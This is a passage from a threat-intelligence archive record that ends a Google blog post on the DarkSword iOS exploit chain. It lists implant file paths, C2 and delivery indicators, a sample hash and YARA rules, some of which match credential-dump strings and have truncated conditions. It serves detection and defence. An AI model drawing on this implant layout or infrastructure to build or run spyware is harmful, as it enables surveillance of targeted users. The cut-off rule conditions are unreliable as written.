Additionally, the libraries in GHOSTBLADE contained a reference to a function called startSandworm() which was not implemented within it; we suspect this may be a codename for a different exploit.\r\nsrc/InjectJS.js\r\nsrc/libs/Chain/Chain.js\r\nsrc/libs/Chain/Native.js\r\nsrc/libs/Chain/OffsetsStruct.js\r\nsrc/libs/Driver/Driver.js\r\nsrc/libs/Driver/DriverNewThread.js\r\nsrc/libs/Driver/Offsets.js\r\nsrc/libs/Driver/OffsetsTable.js\r\nsrc/libs/JSUtils/FileUtils.js\r\nsrc/libs/JSUtils/Logger.js\r\nsrc/libs/JSUtils/Utils.js\r\nsrc/libs/TaskRop/Exception.js\r\nsrc/libs/TaskRop/ExceptionMessageStruct.js\r\nsrc/libs/TaskRop/ExceptionReplyStruct.js\r\nsrc/libs/TaskRop/MachMsgHeaderStruct.js\r\nsrc/libs/TaskRop/PAC.js\r\nsrc/libs/TaskRop/PortRightInserter.js\r\nsrc/libs/TaskRop/RegistersStruct.js\r\nsrc/libs/TaskRop/RemoteCall.js\r\nsrc/libs/TaskRop/Sandbox.js\r\nsrc/libs/TaskRop/SelfTaskStruct.js\r\nsrc/libs/TaskRop/Task.js\r\nsrc/libs/TaskRop/TaskRop.js\r\nsrc/libs/TaskRop/Thread.js\r\nsrc/libs/TaskRop/ThreadState.js\r\nsrc/libs/TaskRop/VM.js\r\nsrc/libs/TaskRop/VmMapEntry.js\r\nsrc/libs/TaskRop/VMObject.js\r\nsrc/libs/TaskRop/VmPackingParams.js\r\nsrc/libs/TaskRop/VMShmem.js\r\nsrc/loader.js\r\nsrc/main.js\r\nsrc/MigFilterBypassThread.js\r\nFigure 22: Filepath artifacts from GHOSTBLADE sample\r\nOutlook and Implications\r\nThe use of both DarkSword and Coruna by a variety of actors demonstrates the ongoing risk of exploit proliferation across actors of varying geography and motivation. Google remains committed to aiding in the mitigation of this problem, in part through our ongoing participation in the Pall Mall Process, designed to build consensus and progress toward limiting the harms from the spyware industry. 
Together, we are focused on developing international norms and frameworks to limit the misuse of these powerful technologies and protect human rights around the world. These efforts build on earlier governmental actions, including steps taken by the US Government to limit government use of spyware, and a first-of-its-kind international commitment to similar efforts.\r\nAcknowledgments\r\nWe would like to acknowledge and thank Lookout, iVerify, Google Project Zero, and the Apple Security Engineering \u0026 Architecture team for their partnership throughout this investigation.\r\nIndicators of Compromise (IOCs)\r\nTo assist the wider community in hunting and identifying the activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users. We've also uploaded a sample of GHOSTBLADE to VirusTotal.\r\nNetwork Indicators\r\nIOC | Threat Actor | Context\r\nsnapshare[.]chat | UNC6748 | DarkSword delivery used in Saudi Arabia\r\n62.72.21[.]10 | UNC6748 | GHOSTKNIFE C2 server (November 2025)\r\n72.60.98[.]48 | UNC6748 | GHOSTKNIFE C2 server (November 2025)\r\nsahibndn[.]io | PARS Defense | DarkSword delivery used in Turkey\r\ne5.malaymoil[.]com | PARS Defense | DarkSword delivery used in Malaysia\r\nstatic.cdncounter[.]net | UNC6353 | DarkSword delivery via watering holes in Ukraine\r\nsqwas.shapelie[.]com | UNC6353 | GHOSTBLADE exfiltration server\r\nFile Indicators\r\nIOC | Threat Actor | Context\r\n2e5a56beb63f21d9347310412ae6efb29fd3db2d3a3fc0798865a29a3c578d35 | UNC6353 | Extracted GHOSTBLADE sample\r\nDetections\r\nYARA Rules\r\nrule G_Backdoor_GHOSTKNIFE_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"server_pub_ex\"\r\n$ = \"client_pri_ds\"\r\n$ = \"getfilebyExtention\"\r\n$ = \"getContOfFilesForModule\"\r\n$ = \"carPlayConnectionState\"\r\n$ = 
\"saveRecordingApp\"\r\n$ = \"getLastItemBack\"\r\n$ = \"the inherted class\"\r\n$ = \"passExtetion\"\r\ncondition:\r\nfilesize \u003c 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) ==\r\n}\r\nrule G_Backdoor_GHOSTSABER_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"sendDeviceInfoJson\"\r\n$ = \"merge2AppLists\"\r\n$ = \"send_command_to_upper_process\"\r\n$ = \"ChangeStatusCheckSleepInterval\"\r\n$ = \"SendRegEx\"\r\n$ = \"evalJsResponse.json\"\r\n$ = \"sendSimpleUploadJsonObject\"\r\n$ = \"device_info_all\"\r\n$ = \"getPayloadForSimpleStatusRequest\"\r\ncondition:\r\nfilesize \u003c 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) ==\r\n}\r\nrule G_Datamine_GHOSTBLADE_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"/private/var/tmp/wifi_passwords.txt\"\r\n$ = \"/private/var/tmp/wifi_passwords_securityd.txt\"\r\n$ = \"/.com.apple.mobile_container_manager.metadata.plist\" fullword\r\n$ = \"X-Device-UUID: ${\"\r\n$ = \"/installed_apps.txt\" fullword\r\n$ = \"icloud_dump_\" fullword\r\ncondition:\r\nfilesize \u003c 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) ==\r\n}\r\nrule G_Hunting_DarkSwordExploitChain_ImplantLib_FilePaths_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"src/InjectJS.js\"\r\n$ = \"src/libs/Chain/Chain.js\"\r\n$ = \"src/libs/Chain/Native.js\"\r\n$ = \"src/libs/Chain/OffsetsStruct.js\"\r\n$ = \"src/libs/Driver/Driver.js\"\r\n$ = \"src/libs/Driver/DriverNewThread.js\"\r\n$ = \"src/libs/Driver/Offsets.js\"\r\n$ = \"src/libs/Driver/OffsetsTable.js\"\r\n$ = \"src/libs/JSUtils/FileUtils.js\"\r\n$ = 
\"src/libs/JSUtils/Logger.js\"\r\n$ = \"src/libs/JSUtils/Utils.js\"\r\n$ = \"src/libs/TaskRop/Exception.js\"\r\n$ = \"src/libs/TaskRop/ExceptionMessageStruct.js\"\r\n$ = \"src/libs/TaskRop/ExceptionReplyStruct.js\"\r\n$ = \"src/libs/TaskRop/MachMsgHeaderStruct.js\"\r\n$ = \"src/libs/TaskRop/PAC.js\"\r\n$ = \"src/libs/TaskRop/PortRightInserter.js\"\r\n$ = \"src/libs/TaskRop/RegistersStruct.js\"\r\n$ = \"src/libs/TaskRop/RemoteCall.js\"\r\n$ = \"src/libs/TaskRop/Sandbox.js\"\r\n$ = \"src/libs/TaskRop/SelfTaskStruct.js\"\r\n$ = \"src/libs/TaskRop/Task.js\"\r\n$ = \"src/libs/TaskRop/TaskRop.js\"\r\n$ = \"src/libs/TaskRop/Thread.js\"\r\n$ = \"src/libs/TaskRop/ThreadState.js\"\r\n$ = \"src/libs/TaskRop/VM.js\"\r\n$ = \"src/libs/TaskRop/VmMapEntry.js\"\r\n$ = \"src/libs/TaskRop/VMObject.js\"\r\n$ = \"src/libs/TaskRop/VmPackingParams.js\"\r\n$ = \"src/libs/TaskRop/VMShmem.js\"\r\n$ = \"src/MigFilterBypassThread.js\"\r\ncondition:\r\nany of them\r\n}\r\nPosted in Threat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain"
	],
	"report_names": [
		"darksword-ios-exploit-chain"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5aec0b5-627c-445c-b41c-32ee81358344",
			"created_at": "2026-03-06T02:00:03.105841Z",
			"updated_at": "2026-04-10T02:00:03.977432Z",
			"deleted_at": null,
			"main_name": "UNC6353",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6353",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434607,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/62eabf70d765e7fc055409aa7008f48ee4ec3cfb.pdf",
		"text": "https://archive.orkl.eu/62eabf70d765e7fc055409aa7008f48ee4ec3cfb.txt",
		"img": "https://archive.orkl.eu/62eabf70d765e7fc055409aa7008f48ee4ec3cfb.jpg"
	}
}